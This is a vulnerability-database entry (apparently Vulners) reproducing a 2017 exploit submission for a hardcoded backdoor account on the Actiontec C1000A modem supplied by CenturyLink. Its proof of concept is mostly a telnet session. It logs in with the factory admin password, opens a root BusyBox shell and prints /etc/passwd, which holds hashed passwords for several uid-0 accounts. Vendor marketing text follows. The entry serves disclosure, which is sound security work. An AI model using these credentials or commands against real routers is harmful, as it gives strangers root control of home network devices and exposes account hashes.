Vulners
Lucene search
Actiontec C1000A Modem - Backdoor Account Vulnerability
# Exploit Title: Actiontec C1000A backdoor account
# Google Dork: NA
# Date: 11/04/2017
# Exploit Author: Joseph McDonagh
# Vendor Homepage: https://actiontecsupport.zendesk.com/hc/en-us
# Software Link: N/A Hardware
# Version: Firmware CAC003-31.30L.86
# Tested on: Linux
# CVE : NA
# The Actiontec C1000A Modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use.
# Proof of Concept
$ telnet 192.168.0.1
===Actiontec xDSL Router===
Login: admin
Password: CenturyL1nk
> sh
BusyBox v1.17.2 (2015-10-30 10:34:29 CST built-in shell (ash)
Enter 'help' for a list of build-in commands
# cat /etc/passwd
admin:Rtqa.nQhYPBRo:0:0:Administratir:/:/bin/sh
support:vmiTSa8ukDkOY:0:0:Technical Support:/:/bin/sh
user:Fq10qi6QmLmmY:0:0:Normal User:/:/bin/sh
nobody:rZy3YulyLvuYU:0:0:nobody for ftp:/bin/sh
# cat /proc/version
Linux version 2.6.30 ([email protected]) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015
# cat /etc/group
root::0:root,admin,support,user
# 0day.today [2018-03-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Nov 2017 00:00Current
7.1High risk
Vulners AI Score7.1